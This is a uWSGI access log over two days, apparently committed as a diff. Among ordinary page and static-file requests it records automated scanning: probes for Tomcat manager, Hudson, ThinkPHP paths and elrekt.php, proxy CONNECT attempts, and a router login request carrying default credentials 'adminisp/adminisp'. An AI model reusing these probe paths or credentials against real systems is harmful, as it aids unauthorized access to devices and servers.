+[pid: 12823|app: 0|req: 793/1071] 211.99.98.229 () {24 vars in 301 bytes} [Mon Jan 11 08:00:40 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 794/1072] 78.36.244.27 () {28 vars in 403 bytes} [Mon Jan 11 08:00:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 795/1073] 115.28.105.155 () {30 vars in 413 bytes} [Mon Jan 11 08:12:34 2021] GET /manager/html => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 796/1074] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 08:15:46 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+invalid request block size: 23301 (max 4096)...skip
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 220.194.106.61 client_port: 38542] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647]
+[pid: 12823|app: 0|req: 797/1075] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 09:00:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 798/1076] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 09:38:22 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+invalid request block size: 8549 (max 4096)...skip
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 220.194.106.61 client_port: 57841] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647]
+[pid: 12823|app: 0|req: 799/1077] 106.13.42.140 () {22 vars in 235 bytes} [Mon Jan 11 09:51:29 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0)
+Not Found: /manager/html
+[pid: 12823|app: 0|req: 800/1078] 106.13.42.140 () {24 vars in 301 bytes} [Mon Jan 11 09:51:29 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 801/1079] 45.195.12.232 () {36 vars in 491 bytes} [Mon Jan 11 10:12:16 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 802/1080] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 10:18:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 803/1081] 45.5.37.30 () {28 vars in 400 bytes} [Mon Jan 11 10:19:52 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 804/1082] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 10:56:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /hudson
+[pid: 12823|app: 0|req: 805/1083] 192.241.222.241 () {30 vars in 356 bytes} [Mon Jan 11 11:24:57 2021] GET /hudson => generated 3382 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 806/1084] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 11:38:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 807/1085] 71.6.232.4 () {30 vars in 433 bytes} [Mon Jan 11 12:03:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 808/1086] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 12:17:13 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /boaform/admin/formLogin
+[pid: 12823|app: 0|req: 809/1087] 117.222.171.172 () {22 vars in 333 bytes} [Mon Jan 11 12:25:34 2021] GET /boaform/admin/formLogin?username=adminisp&psd=adminisp => generated 3469 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 810/1088] 83.97.20.34 () {26 vars in 278 bytes} [Mon Jan 11 12:39:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 811/1089] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 12:55:47 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 812/1090] 178.32.197.88 () {32 vars in 491 bytes} [Mon Jan 11 12:56:18 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 12823|app: 0|req: 813/1091] 195.154.63.222 () {32 vars in 514 bytes} [Mon Jan 11 13:29:06 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 814/1092] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 13:37:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 815/1093] 128.14.209.226 () {30 vars in 438 bytes} [Mon Jan 11 14:17:30 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 816/1094] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 14:22:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+invalid request block size: 21611 (max 4096)...skip
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 58.247.212.239 client_port: 51188] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647]
+[pid: 12823|app: 0|req: 817/1095] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 15:00:58 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 818/1096] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 15:39:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 819/1097] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 16:10:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 820/1098] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 16:16:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /ip.ws.126.net:443
+[pid: 12823|app: 0|req: 821/1099] 222.186.136.150 () {26 vars in 330 bytes} [Mon Jan 11 17:42:05 2021] CONNECT ip.ws.126.net:443 => generated 1670 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 822/1100] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 17:53:20 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 823/1101] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 17:53:31 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 824/1102] 188.232.121.41 () {28 vars in 405 bytes} [Mon Jan 11 18:27:22 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[uwsgi-http key: client_addr: 61.219.11.153 client_port: 12281] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+[pid: 12823|app: 0|req: 825/1103] 89.208.122.220 () {28 vars in 404 bytes} [Mon Jan 11 19:03:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 826/1104] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 19:17:18 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 827/1105] 83.97.20.21 () {26 vars in 278 bytes} [Mon Jan 11 20:51:48 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 828/1106] 183.136.225.35 () {30 vars in 411 bytes} [Mon Jan 11 21:43:41 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[uwsgi-http key: sd4404386.adsl.online.nl client_addr: 183.136.225.35 client_port: 24914] hr_read(): Connection reset by peer [plugins/http/http.c line 917]
+[pid: 12823|app: 0|req: 829/1107] 101.32.12.80 () {22 vars in 233 bytes} [Mon Jan 11 22:23:02 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 0)
+Not Found: /manager/html/
+[pid: 12823|app: 0|req: 830/1108] 101.32.12.80 () {24 vars in 301 bytes} [Mon Jan 11 22:23:02 2021] GET /manager/html/ => generated 3404 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 831/1109] 82.123.41.126 () {30 vars in 342 bytes} [Mon Jan 11 22:30:25 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 832/1110] 83.97.20.34 () {26 vars in 278 bytes} [Mon Jan 11 22:39:16 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /http:/110.242.68.4/
+[pid: 12823|app: 0|req: 833/1111] 175.152.109.102 () {40 vars in 811 bytes} [Mon Jan 11 22:48:45 2021] HEAD http://110.242.68.4/ => generated 1670 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 834/1112] 83.97.20.21 () {26 vars in 277 bytes} [Mon Jan 11 23:19:54 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 835/1113] 78.177.245.116 () {28 vars in 404 bytes} [Mon Jan 11 23:33:59 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 836/1114] 198.143.155.122 () {30 vars in 438 bytes} [Mon Jan 11 23:41:05 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 837/1115] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 00:43:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 838/1116] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 01:39:02 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /TP/public/index.php
+[pid: 12823|app: 0|req: 839/1117] 36.27.208.157 () {30 vars in 449 bytes} [Tue Jan 12 01:42:23 2021] GET /TP/public/index.php => generated 3421 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /TP/index.php
+[pid: 12823|app: 0|req: 840/1118] 36.27.208.157 () {30 vars in 435 bytes} [Tue Jan 12 01:42:23 2021] GET /TP/index.php => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /thinkphp/html/public/index.php
+[pid: 12823|app: 0|req: 841/1119] 36.27.208.157 () {30 vars in 471 bytes} [Tue Jan 12 01:42:23 2021] GET /thinkphp/html/public/index.php => generated 3454 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /html/public/index.php
+[pid: 12823|app: 0|req: 842/1120] 36.27.208.157 () {30 vars in 453 bytes} [Tue Jan 12 01:42:23 2021] GET /html/public/index.php => generated 3427 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /public/index.php
+[pid: 12823|app: 0|req: 843/1121] 36.27.208.157 () {30 vars in 443 bytes} [Tue Jan 12 01:42:23 2021] GET /public/index.php => generated 3412 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /TP/html/public/index.php
+[pid: 12823|app: 0|req: 844/1122] 36.27.208.157 () {30 vars in 459 bytes} [Tue Jan 12 01:42:23 2021] GET /TP/html/public/index.php => generated 3436 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /elrekt.php
+[pid: 12823|app: 0|req: 845/1123] 36.27.208.157 () {30 vars in 431 bytes} [Tue Jan 12 01:42:23 2021] GET /elrekt.php => generated 3394 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /index.php
+[pid: 12823|app: 0|req: 846/1124] 36.27.208.157 () {30 vars in 429 bytes} [Tue Jan 12 01:42:23 2021] GET /index.php => generated 3391 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /users
+[pid: 12823|app: 0|req: 847/1125] 36.27.208.157 () {34 vars in 517 bytes} [Tue Jan 12 01:42:23 2021] POST /users?page=&size=5 => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 848/1126] 36.27.208.157 () {30 vars in 411 bytes} [Tue Jan 12 01:42:23 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 849/1127] 128.14.234.165 () {30 vars in 355 bytes} [Tue Jan 12 02:07:04 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 12823|app: 0|req: 850/1128] 128.14.234.165 () {30 vars in 376 bytes} [Tue Jan 12 02:07:11 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 851/1129] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 02:26:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+invalid request block size: 34826 (max 4096)...skip
+[uwsgi-http key: 212.64.67.134:8080 client_addr: 101.89.19.140 client_port: 34034] hr_instance_read(): Connection reset by peer [plugins/http/http.c line 647]
+[pid: 12823|app: 0|req: 852/1130] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 03:07:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 853/1131] 83.97.20.25 () {22 vars in 223 bytes} [Tue Jan 12 03:31:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 854/1132] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 03:57:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 855/1133] 83.97.20.21 () {26 vars in 278 bytes} [Tue Jan 12 04:40:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 856/1134] 219.228.146.225 () {38 vars in 789 bytes} [Tue Jan 12 05:00:51 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 857/1135] 219.228.146.225 () {40 vars in 845 bytes} [Tue Jan 12 05:02:00 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 858/1136] 219.228.146.225 () {40 vars in 848 bytes} [Tue Jan 12 05:02:00 2021] GET /my-admin/ => generated 5354 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 859/1137] 219.228.146.225 () {38 vars in 806 bytes} [Tue Jan 12 05:02:02 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1138] 219.228.146.225 () {38 vars in 867 bytes} [Tue Jan 12 05:02:04 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: 0|req: 860/1139] 219.228.146.225 () {48 vars in 1010 bytes} [Tue Jan 12 05:02:13 2021] POST /my-admin/ => generated 27 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 861/1140] 219.228.146.225 () {40 vars in 859 bytes} [Tue Jan 12 05:02:13 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 862/1141] 219.228.146.225 () {40 vars in 861 bytes} [Tue Jan 12 05:02:13 2021] GET /admin-home/ => generated 9586 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 12823|app: -1|req: -1/1142] 219.228.146.225 () {38 vars in 801 bytes} [Tue Jan 12 05:02:13 2021] GET /static/css/style.css => generated 118751 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1143] 219.228.146.225 () {38 vars in 813 bytes} [Tue Jan 12 05:02:13 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1144] 219.228.146.225 () {38 vars in 867 bytes} [Tue Jan 12 05:02:13 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 4 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1145] 219.228.146.225 () {38 vars in 830 bytes} [Tue Jan 12 05:02:13 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1146] 219.228.146.225 () {38 vars in 848 bytes} [Tue Jan 12 05:02:13 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1147] 219.228.146.225 () {38 vars in 806 bytes} [Tue Jan 12 05:02:15 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1148] 219.228.146.225 () {38 vars in 782 bytes} [Tue Jan 12 05:02:15 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1149] 219.228.146.225 () {38 vars in 870 bytes} [Tue Jan 12 05:02:15 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 11 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1150] 219.228.146.225 () {38 vars in 792 bytes} [Tue Jan 12 05:02:15 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1151] 219.228.146.225 () {38 vars in 866 bytes} [Tue Jan 12 05:02:15 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 12823|app: -1|req: -1/1152] 219.228.146.225 () {38 vars in 842 bytes} [Tue Jan 12 05:02:15 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 12823|app: -1|req: -1/1153] 219.228.146.225 () {38 vars in 794 bytes} [Tue Jan 12 05:02:16 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 863/1154] 219.228.146.225 () {38 vars in 871 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 864/1155] 219.228.146.225 () {38 vars in 883 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 865/1156] 219.228.146.225 () {38 vars in 875 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 866/1157] 219.228.146.225 () {38 vars in 860 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 867/1158] 219.228.146.225 () {38 vars in 859 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 868/1159] 219.228.146.225 () {38 vars in 915 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 869/1160] 219.228.146.225 () {38 vars in 807 bytes} [Tue Jan 12 05:02:16 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 870/1161] 219.228.146.225 () {38 vars in 805 bytes} [Tue Jan 12 05:02:16 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 871/1162] 219.228.146.225 () {38 vars in 840 bytes} [Tue Jan 12 05:02:16 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 872/1163] 219.228.146.225 () {40 vars in 865 bytes} [Tue Jan 12 05:02:23 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0)
+[pid: 12823|app: 0|req: 873/1164] 219.228.146.225 () {40 vars in 867 bytes} [Tue Jan 12 05:02:23 2021] GET /announcement/ => generated 8250 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 874/1165] 219.228.146.225 () {38 vars in 873 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 12823|app: 0|req: 875/1166] 219.228.146.225 () {38 vars in 878 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 12823|app: 0|req: 876/1167] 219.228.146.225 () {38 vars in 886 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 12823|app: 0|req: 877/1168] 219.228.146.225 () {38 vars in 842 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 12823|app: 0|req: 878/1169] 219.228.146.225 () {38 vars in 862 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 12823|app: 0|req: 879/1170] 219.228.146.225 () {38 vars in 918 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 12823|app: 0|req: 880/1171] 219.228.146.225 () {38 vars in 810 bytes} [Tue Jan 12 05:02:23 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 12823|app: 0|req: 881/1172] 219.228.146.225 () {38 vars in 862 bytes} [Tue Jan 12 05:02:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 12823|app: 0|req: 882/1173] 219.228.146.225 () {38 vars in 808 bytes} [Tue Jan 12 05:02:23 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 883/1174] 219.228.146.225 () {40 vars in 866 bytes} [Tue Jan 12 05:02:25 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1)
+[pid: 12823|app: 0|req: 884/1175] 219.228.146.225 () {40 vars in 868 bytes} [Tue Jan 12 05:02:25 2021] GET /kind-manage/ => generated 12023 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 12823|app: 0|req: 885/1176] 219.228.146.225 () {38 vars in 873 bytes} [Tue Jan 12 05:02:25 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
